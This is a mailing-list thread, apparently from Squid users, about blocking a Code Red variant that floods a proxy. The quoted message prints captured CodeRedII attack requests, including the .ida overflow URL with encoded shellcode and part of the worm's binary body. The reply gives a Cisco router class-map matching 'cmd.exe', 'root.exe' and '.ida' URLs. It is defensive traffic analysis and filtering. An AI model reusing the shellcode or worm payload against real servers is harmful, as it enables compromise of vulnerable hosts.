I think for this u will have to deny it from your border router like that Router(config)#class-map match-any http-hacks Router(config-cmap)#match protocol http url "*.ida*" Router(config-cmap)#match protocol http url "*cmd.exe*" Router(config-cmap)#match protocol http url "*root.exe*"
here yours Router(config-cmap)#match protocol http url "XXXXXXXXXXXXX" I think it will work... Best Regards, Masood Ahmad Shah System Administrator Fibre Net Lahore,Pakistan Mobile# +92423004277367 --- Wei Keong <[EMAIL PROTECTED]> wrote: > Hi, > > We are seeing a possible new code red. Each victim > will flood to a > particular destination. Unlike the original one, > this one does not have > send proper HTTP method. Although Squid will return > Bad Request, this > attack will consume a lot of resources and bring > down the Squid box... > > Anybody catches the same thing? It seems to us that > DENIED/403 > requires less processing than returning NONE/400 or > NONE/411. If this it > true, is there anyway to deny these requests? > > > GET > /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX > > XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX > > XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX > > XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX > > X%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u685 > > 8%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53f > f%u0078%u0000%u00=a HTTP/1.0..Content-type: > text/xml.Conten > t-length: 3379 > ........`........dg.6..dg.&.......h......\... > > [EMAIL PROTECTED] > > 0...........F0.........CodeRedII...$.U.f.....8.....P.......j > > ...P...P..8...P.E..p.........8....thS.U..U..E.i.T...,.....,. > > .............F4.E.Pj..u...........j.j..U.P.U.Ou..;...i.T.... > > \&....\&.W.U.j.j..U.j..U....F4)E.jd.U...<...P.U....<...=.... > > s....>......s.f..p.....f..r....P.d.....t...j.j.j..U....t..E. > > j.Th~f...u..U.Yj...p...P.u..U........tK3..U.=3'..u?..h...... > > ...l.........`........E...d.....h...Pj...`...Pj.j..U..j.Th~f > > ...u..U.Y...u1.....X-....j.h....P.u..U.=....u.j.j...\...P.u. > > .U..u..U..........w...........xu......`......d$.dg....Xa..dg > > .6..dg.&..f.;MZu..K<.<.PE..u..T.x...B..<.KERNu..|..EL32u.3.I > .r > ...A..<.GetPu..|..rocAu..J.I...J$........J.......D$$dg... > > .Xa..Q....]..E......LoadLibraryA..u..U..E......CreateThread. > > .u..U..E......GetTickCount..u..U..E......Sleep..u..U..E..... > > .GetSystemDefaultLangID..u..U..E......GetSystemDirectoryA..u > > ..U..E......CopyFileA..u..U..E......GlobalFindAtomA..u..U..E > ......GlobalAddAtomA > > > Squid 2.4S6 reply: HTTP/1.0 411 Length Required. > > > > XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX > > XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX > > XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX > > XXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u780 > > 1%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b0 > 0%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0..Host: > xxx.xx.xxx.x > x..Content-type: text/xml.Content-length: 3379 > ..Cache-Contr > ol: > max-stale=0........`........dg.6..dg.&.......h......\... > > [EMAIL PROTECTED] > > 0...........F0.........CodeRedII...$.U.f.....8.....P.......j > > ...P...P..8...P.E..p.........8....thS.U..U..E.i.T...,.....,. > > .............F4.E.Pj..u...........j.j..U.P.U.Ou..;...i.T.... > > \&....\&.W.U.j.j..U.j..U....F4)E.jd.U...<...P.U....<...=.... > > s....>......s.f..p.....f..r....P.d.....t...j.j.j..U....t..E. > > j.Th~f...u..U.Yj...p...P.u..U........tK3..U.=3'..u?..h...... > > ...l.........`........E...d.....h...Pj...`...Pj.j..U..j.Th~f > > ...u..U.Y...u1.....X-....j.h....P.u..U.=....u.j.j...\...P.u. > > .U..u..U..........w...........xu......`......d$.dg....Xa..dg > > .6..dg.&..f.;MZu..K<.<.PE..u..T.x...B..<.KERNu..|..EL32u.3.I > .r > ...A..<.GetPu..|..rocAu..J.I...J$........J.......D$$dg... > > .Xa..Q....]..E......LoadLibraryA..u..U..E......CreateThread. > > .u..U..E......GetTickCount..u..U..E......Sleep..u..U..E..... > > .GetSystemDefaultLangID..u..U..E......GetSystemDirectoryA..u > > ..U..E......CopyFileA..u..U..E......GlobalFindAtomA..u..U..E > ......Global > > > Squid 2.4S6 reply: HTTP/1.0 400 Bad Request. > > > > Thanks, > Wei Keong > > > __________________________________________________ Do you Yahoo!? Yahoo! Tax Center - File online, calculators, forms, and more http://tax.yahoo.com
